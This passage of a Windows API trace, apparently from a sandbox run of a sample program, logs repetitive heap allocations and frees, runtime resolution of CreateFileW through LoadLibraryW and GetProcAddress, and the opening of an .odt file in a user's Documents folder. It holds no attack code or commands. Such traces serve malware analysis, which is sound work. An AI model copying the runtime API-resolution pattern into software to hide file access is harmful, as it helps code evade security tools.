Size=0x40) returned 0x43a9260 [0079.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0079.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0079.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.309] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.313] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0079.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0079.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cad48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.313] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0079.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0079.314] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\hr3cojo6wftwpyw3h.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0079.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.317] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0079.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.319] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.319] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: 